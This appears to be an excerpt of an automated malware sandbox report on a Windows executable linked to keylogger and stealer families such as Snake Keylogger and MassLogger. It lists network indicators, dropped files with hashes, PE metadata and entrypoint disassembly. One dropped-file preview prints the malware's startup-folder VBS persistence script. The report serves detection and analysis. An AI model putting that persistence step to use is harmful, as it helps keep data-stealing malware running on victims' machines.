	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	SBkuP3ACSA.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	4iDzhJBJVv.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
TELEGRAMRU	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	104.21.28.65
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	104.21.48.233
	https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal	Get hash	malicious	Unknown	Browse	104.17.25.14
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	Encrypted_Archive_2025_LHC1W64SMW.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	SBkuP3ACSA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	SBkuP3ACSA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	v3tK92KcJV.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
3b5074b1b5d032e5620f69f9f700ff0e	MWP0FO5rAF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	MWP0FO5rAF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	grW5hyK960.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	grW5hyK960.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_329aefe0a583e079b85dc8873b2b76569f485ff_af83d973_d53e92a5-3814-4ea7-8360-85bcb389dce7\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0964118333341513
Encrypted:	false
SSDEEP:	192:r6Dk8QFAgT0BU/Sa6ce36izuiFtZ24IO8GW:ehQFAgABU/SarVizuiFtY4IO8G
MD5:	404F0BC922A0E68A86E42D269AB098B3
SHA1:	7D9522A6B279787822D6C1ECB840A624C0C11B10
SHA-256:	5AA60BFD388918BE73EA2F1947A8172F72DBFFBA4C0B3B36EB0146C4C9307022
SHA-512:	9E1A7D83691878CE3276DAD2FDE758AC35D78A06FA4E992B8618823664478A3F9F212775CD0A31B822DB904AA44544A871D587911F27C9DEAA4ABADF9BE7216C
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.0.5.3.2.6.6.0.4.1.8.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.0.5.3.2.7.3.2.2.9.2.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.3.e.9.2.a.5.-.3.8.1.4.-.4.e.a.7.-.8.3.6.0.-.8.5.b.c.b.3.8.9.d.c.e.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.6.5.e.9.5.6.-.1.9.7.7.-.4.1.8.8.-.8.4.b.a.-.b.a.0.0.2.2.4.c.8.8.a.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.b.0.-.0.0.0.1.-.0.0.1.4.-.5.2.d.7.-.d.2.d.0.8.8.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE96C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Jan 10 17:55:26 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	256738
Entropy (8bit):	3.8191472763058436
Encrypted:	false
SSDEEP:	1536:W3OUnM+/kBpN4uE2aOSzVUHLTgFGdQxSVXV7ceANiEaPGGCD6fJ1dDtTFkWvCuBB:W3jMr4uEqo6LTgfxy4Om6T5tS+Z
MD5:	364E2319FDDDD5B16A6111D7885A3CFF
SHA1:	0F622E5A4383AD45AC788B867A681FC7FFE2EA57
SHA-256:	E2744D8C5E6440B7A5F146C7A36EE4E07609FBECFA4292311AFE7542CB065724
SHA-512:	2E87B75542ECB6257AABED8C1CBECCA39E3540851D8B3E5B5F19D87608A6D0758AD781E6DC40CC388F9E6FC5DBE27F53595C876B2A29B67A278C793B424E2D80
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........_.g....................................<....#.......$.."M..........`.......8...........T............:..b............#...........%..............................................................................eJ......P&......GenuineIntel............T............_.g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB13.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8278
Entropy (8bit):	3.696905594575335
Encrypted:	false
SSDEEP:	192:R6l7wVeJj56X6Y9Qi6UVgmfV40Spr189b8gsfE0m:R6lXJ96X6Y+i6UVgmfV40F8zfe
MD5:	E4CED2B91475ADDFA4842F5112A32E31
SHA1:	1BA4BBE25AC66D18A323ED2CB37626D52DCA15E7
SHA-256:	D12C1853DBF4CED1BDA8B06DD195F1178BAB37A65A07231F30FBD7E7BCF07588
SHA-512:	7733ACE3DF962DFF72D06123BA00057F8C7A343DFBA5A2206D831B14DE90F8F663F27662F60A47DA636446AA81FB1176A94CFA815C8789BE5E344BF6A1A31F92
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB43.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4651
Entropy (8bit):	4.473932056300768
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZJg77aI9xGWpW8VY4Ym8M4J6jFMY+q8RH3hMmDIBd:uIjfrI7jH7VEJHYwMmDIBd
MD5:	2C015FF242374899982EF2535CF7A790
SHA1:	1A56D6154FCEF00C808E454124CC954882F03CE1
SHA-256:	96DD3F1566E1FE3A9BCE91FF0AF1C3878D72B848F2508E61493895C314A73290
SHA-512:	152B04317EE7CD21546CCE2F05164B371AD6FCF4851B4576B1AAD5900CF7C7E85B8CBE7F4280CAE5209D3A2E9B66C8D96CAEA7F9954D074BB71167B3A7D3D397
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670138" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\Halitherses

Download File

Process:	C:\Users\user\Desktop\YJwE2gTm02.exe
File Type:	data
Category:	dropped
Size (bytes):	274432
Entropy (8bit):	6.664422602933026
Encrypted:	false
SSDEEP:	6144:91DSo7mT0/UdtlL3JQ/wZ4BvQ7M8ia+KDu2QQO8mQ0YyykZpZasWz+K0e0ZZ2OT:9Eo7mTiUdtlL3JQ/wZ4BvQ7M8i/SjQ3T
MD5:	923DD36436CE48D1A7FC88014046AE5B
SHA1:	E7435CBB493AEEE6B5AA341817FD7445427EF199
SHA-256:	79F6A8ADB018D08BA2F9ED4CBD36A4D8A3F39548CE64DA608F0458CBFE1AA4F3
SHA-512:	4085F245ABFDD889793C700AEB27E60313908A6FDD4FC30B0A5F3777A051D1397A6D42B7C9B8587F6135DA941B045E319AA19968CE24FDD5A61E981359E87E76
Malicious:	false
Preview:	...2QCBTQXXT.63.TBU2RCB.UXXT1M63TTBU2RCBTUXXT1M63TTBU2RCBTU.XT1C).ZT.\.s.C..y.<X>.C&;%'S?c!5;67 ./S.&!,u[<c...x5;U(.>Y^fU2RCBTU..T1.70T...TRCBTUXXT.M42_U.U2HGBTAXXT1M6}lPBU.RCB.QXXTqM6.TTBW2RGBTUXXT1I63TTBU2R.FTUZXT1M63VT..2RSBTEXXT1]63DTBU2RCRTUXXT1M63TT.b6R.BTUX.P1Z&3TTBU2RCBTUXXT1M63T4FU>RCBTUXXT1M63TTBU2RCBTUXXT1M63TTBU2RCBTUXXT1M63TTBU2RcBT]XXT1M63TTBU:rCB.UXXT1M63TTB{F7;6TUX.L5M6.TTBO6RC@TUXXT1M63TTBU2rCB4{+&RM63CDBU2.GBTGXXT-I63TTBU2RCBTUX.T1..A18-62ROBTUX8P1M43TTlQ2RCBTUXXT1M63.TB.2RCBTUXXT1M63TTBe.VCBTUX.T1M43QT..0R#.UU[XT1.63R..W2.CBTUXXT1M63TTBU2RCBTUXXT1M63TTBU2RCBTUXXT1M.N.[...;0.UXXT1M71WPD]:RCBTUXXTOM63.TBUrRCBcUXXq1M6^TTBq2RC<TUX&T1MR3TT0U2R"BTU.XT1"63T:BU2,CBTKZpt1M<.rT@}.RCHT..+v1M<.UTBQAqCB^.ZXT5>.3T^.V2RG1qUXR.5M67'rBU8.FBTQr.T2. 5TTY:.RCHTV.MR1M-.rT@}.RCHT.~XW.X03TOhw2P.KTU\r.BP63R\|.U2X7KTUZ.^1M2.JVj.2RIhv+SXT5f6.vNU2VhB~w&UT1I.3~J@.?RCF~w&VT1I.3~v<Z2RGiT.FZ.>M67~v<E2RGiT.z&E1M2.T~`+ RCF.Urz*"M67.ThwLFCBP~XrvOX63P.B..,UBTQsX~.3!3TPiU.p=ZTU\sT.S4.LTBQ.Ti T'.MTAN

C:\Users\user\AppData\Local\Temp\aut8DDF.tmp

Download File

Process:	C:\Users\user\Desktop\YJwE2gTm02.exe
File Type:	data
Category:	dropped
Size (bytes):	128388
Entropy (8bit):	7.934350511069404
Encrypted:	false
SSDEEP:	3072:Anai86lvTXpj9HRXob0iP5oS5XOXfEmv/Vi43joA2FZmEXTXaX:Anai8YZj9OxPOS5+Xf7p2bXaX
MD5:	DDB9F59536987A8594197B391746D911
SHA1:	0015B749D7F15AA579E0313F8F82D77A6DB773D5
SHA-256:	33973F7A314486AAC80DD86262DEC7270FD5975F22EDC45C1B3BBBCC930E52D8
SHA-512:	758709D382A715237DBDF90ECE13F259087DE93C7D4AD6B9C613043C601BE9F200A9FEC6BBD2B822DF2614F042B4E01A418551DC664ABB454AF5CA54A9DBB658
Malicious:	false
Preview:	EA06..0...8....T..+.Nv.m3.U(UY.J.B.U@.I.6m3.....#....J...Z.}.......^a....-C.N.z...!....y.F_S..2.nyc.F....(.O.5.0.&a....7.U1.~-P..].l.e_...E..T..;..l.P.. ......f.0...2.Q.&sI.....T...V.@...N.T...5...w...gwV).J .........Q.......G.......T:.p....4.w6.3!...f).j.........K.W&....: .....(..D.....F..lb.1.Kf..<.E.T&4...l..L..J....U..aU`.. ."M&u..k.0.H..Z.l....u-.b.2.....Zv....v.s.n..G.y.^.D....O.3"@.e..D......B...\@.....&.3@....T......BD..N...`.!K.\...l.3r.P/.:...T..w`..gU.P.4....^...Y.JgT.p..D...U.T..,..Or.Ug.0.ar.U&[9..T..`..[MM.Li...Z..._..~}ba3.S..y.C.K.Uk.(.... _ 5Y.bn."V...6e..U.Q..J.h.J.`..m..J..Y.Z.B.]..P)r;3.R..Y.J.F....8.O+@.%....V......D.....&.......+................L.P.U..b.v..&.:.....K....~...3:.B.U.\'.....T...:`....Zd.I?.T..8.R.}.n...b.R...9U".U.T%..V.~.g..R.F....U..X.P.r.......&5jUVQp......R.S.^#...WX.N.I.........b.~..f..@....P.U+.j.V.Sg.....~...I./mR.f/...yA...:u..."U.......L.r95R.@..e.....&.;....0.O..0..cO.."..b.C.U...

C:\Users\user\AppData\Local\Temp\aut96B8.tmp

Download File

Process:	C:\Users\user\AppData\Local\toggeries\savagenesses.exe
File Type:	data
Category:	dropped
Size (bytes):	128388
Entropy (8bit):	7.934350511069404
Encrypted:	false
SSDEEP:	3072:Anai86lvTXpj9HRXob0iP5oS5XOXfEmv/Vi43joA2FZmEXTXaX:Anai8YZj9OxPOS5+Xf7p2bXaX
MD5:	DDB9F59536987A8594197B391746D911
SHA1:	0015B749D7F15AA579E0313F8F82D77A6DB773D5
SHA-256:	33973F7A314486AAC80DD86262DEC7270FD5975F22EDC45C1B3BBBCC930E52D8
SHA-512:	758709D382A715237DBDF90ECE13F259087DE93C7D4AD6B9C613043C601BE9F200A9FEC6BBD2B822DF2614F042B4E01A418551DC664ABB454AF5CA54A9DBB658
Malicious:	false
Preview:	EA06..0...8....T..+.Nv.m3.U(UY.J.B.U@.I.6m3.....#....J...Z.}.......^a....-C.N.z...!....y.F_S..2.nyc.F....(.O.5.0.&a....7.U1.~-P..].l.e_...E..T..;..l.P.. ......f.0...2.Q.&sI.....T...V.@...N.T...5...w...gwV).J .........Q.......G.......T:.p....4.w6.3!...f).j.........K.W&....: .....(..D.....F..lb.1.Kf..<.E.T&4...l..L..J....U..aU`.. ."M&u..k.0.H..Z.l....u-.b.2.....Zv....v.s.n..G.y.^.D....O.3"@.e..D......B...\@.....&.3@....T......BD..N...`.!K.\...l.3r.P/.:...T..w`..gU.P.4....^...Y.JgT.p..D...U.T..,..Or.Ug.0.ar.U&[9..T..`..[MM.Li...Z..._..~}ba3.S..y.C.K.Uk.(.... _ 5Y.bn."V...6e..U.Q..J.h.J.`..m..J..Y.Z.B.]..P)r;3.R..Y.J.F....8.O+@.%....V......D.....&.......+................L.P.U..b.v..&.:.....K....~...3:.B.U.\'.....T...:`....Zd.I?.T..8.R.}.n...b.R...9U".U.T%..V.~.g..R.F....U..X.P.r.......&5jUVQp......R.S.^#...WX.N.I.........b.~..f..@....P.U+.j.V.Sg.....~...I./mR.f/...yA...:u..."U.......L.r95R.@..e.....&.;....0.O..0..cO.."..b.C.U...

C:\Users\user\AppData\Local\Temp\autCEFF.tmp

Download File

Process:	C:\Users\user\AppData\Local\toggeries\savagenesses.exe
File Type:	data
Category:	dropped
Size (bytes):	128388
Entropy (8bit):	7.934350511069404
Encrypted:	false
SSDEEP:	3072:Anai86lvTXpj9HRXob0iP5oS5XOXfEmv/Vi43joA2FZmEXTXaX:Anai8YZj9OxPOS5+Xf7p2bXaX
MD5:	DDB9F59536987A8594197B391746D911
SHA1:	0015B749D7F15AA579E0313F8F82D77A6DB773D5
SHA-256:	33973F7A314486AAC80DD86262DEC7270FD5975F22EDC45C1B3BBBCC930E52D8
SHA-512:	758709D382A715237DBDF90ECE13F259087DE93C7D4AD6B9C613043C601BE9F200A9FEC6BBD2B822DF2614F042B4E01A418551DC664ABB454AF5CA54A9DBB658
Malicious:	false
Preview:	EA06..0...8....T..+.Nv.m3.U(UY.J.B.U@.I.6m3.....#....J...Z.}.......^a....-C.N.z...!....y.F_S..2.nyc.F....(.O.5.0.&a....7.U1.~-P..].l.e_...E..T..;..l.P.. ......f.0...2.Q.&sI.....T...V.@...N.T...5...w...gwV).J .........Q.......G.......T:.p....4.w6.3!...f).j.........K.W&....: .....(..D.....F..lb.1.Kf..<.E.T&4...l..L..J....U..aU`.. ."M&u..k.0.H..Z.l....u-.b.2.....Zv....v.s.n..G.y.^.D....O.3"@.e..D......B...\@.....&.3@....T......BD..N...`.!K.\...l.3r.P/.:...T..w`..gU.P.4....^...Y.JgT.p..D...U.T..,..Or.Ug.0.ar.U&[9..T..`..[MM.Li...Z..._..~}ba3.S..y.C.K.Uk.(.... _ 5Y.bn."V...6e..U.Q..J.h.J.`..m..J..Y.Z.B.]..P)r;3.R..Y.J.F....8.O+@.%....V......D.....&.......+................L.P.U..b.v..&.:.....K....~...3:.B.U.\'.....T...:`....Zd.I?.T..8.R.}.n...b.R...9U".U.T%..V.~.g..R.F....U..X.P.r.......&5jUVQp......R.S.^#...WX.N.I.........b.~..f..@....P.U+.j.V.Sg.....~...I./mR.f/...yA...:u..."U.......L.r95R.@..e.....&.;....0.O..0..cO.."..b.C.U...

C:\Users\user\AppData\Local\toggeries\savagenesses.exe

Download File

Process:	C:\Users\user\Desktop\YJwE2gTm02.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1135616
Entropy (8bit):	6.930412207586632
Encrypted:	false
SSDEEP:	24576:xqDEvCTbMWu7rQYlBQcBiT6rprG8aSVXndE2dx4B:xTvC/MTQYxsWR7aSFdE2v
MD5:	88AE8BDA9D82167C30205B7BE959D2B5
SHA1:	204D1AA6F9CFB662BABBA813BBBE54371C11D6B3
SHA-256:	2E6F9A5FCFCE60E9A28545DD9171993ED51D5E6DDB90643B9D3EA16F64C8A076
SHA-512:	CF88685CDAA09C6062E761B2D2B06F3636340B1C96D648A968B4655B32FD7716C5F08FA1D5A0D701EC6D001CC5A9EEE75817D8A9FCB475AC404C18E6AF071320
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74% Antivirus: Virustotal, Detection: 44%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....\|bg..........".................w.............@.................................d.....@...@.......@.....................d...\|....@.......................0...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u...0...v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs

Download File

Process:	C:\Users\user\AppData\Local\toggeries\savagenesses.exe
File Type:	data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	3.3794214079727936
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1hY8k0GMMlA36nriIM8lfQVn:DsO+vNlzQ1/GMko4mA2n
MD5:	E7A15090B903A26064D5E38323CD1982
SHA1:	100B61830F72F4A726D190D3C397170C75FA2D74
SHA-256:	9C9AD991259B766F77B5FC40DBD5CFBA418EF379526538D5520165652D099B05
SHA-512:	C21321A215EEDD409D40B1130A8CA47401A541AD9A73C7ACFA5481C1956100FFE675036ECA15C30C7F8E15808E4DCCD05DACF53CB7CD1DE7173621997E094416
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.t.o.g.g.e.r.i.e.s.\.s.a.v.a.g.e.n.e.s.s.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.930412207586632
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	YJwE2gTm02.exe
File size:	1'135'616 bytes
MD5:	88ae8bda9d82167c30205b7be959d2b5
SHA1:	204d1aa6f9cfb662babba813bbbe54371c11d6b3
SHA256:	2e6f9a5fcfce60e9a28545dd9171993ed51d5e6ddb90643b9d3ea16f64c8a076
SHA512:	cf88685cdaa09c6062e761b2d2b06f3636340b1c96d648a968b4655b32fd7716c5f08fa1d5a0d701ec6d001cc5a9eee75817d8a9fcb475ac404c18e6af071320
SSDEEP:	24576:xqDEvCTbMWu7rQYlBQcBiT6rprG8aSVXndE2dx4B:xTvC/MTQYxsWR7aSFdE2v
TLSH:	46359D03738D822EFF9B95722A7AE221467C6F270123A51F33D85D7DB970161163E6E2
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	24ed8d96b2ade832

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67627CBF [Wed Dec 18 07:41:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FBFE0DEA443h
jmp 00007FBFE0DE9D4Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FBFE0DE9F2Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FBFE0DE9EFAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FBFE0DECAEDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FBFE0DECB38h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FBFE0DECB21h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

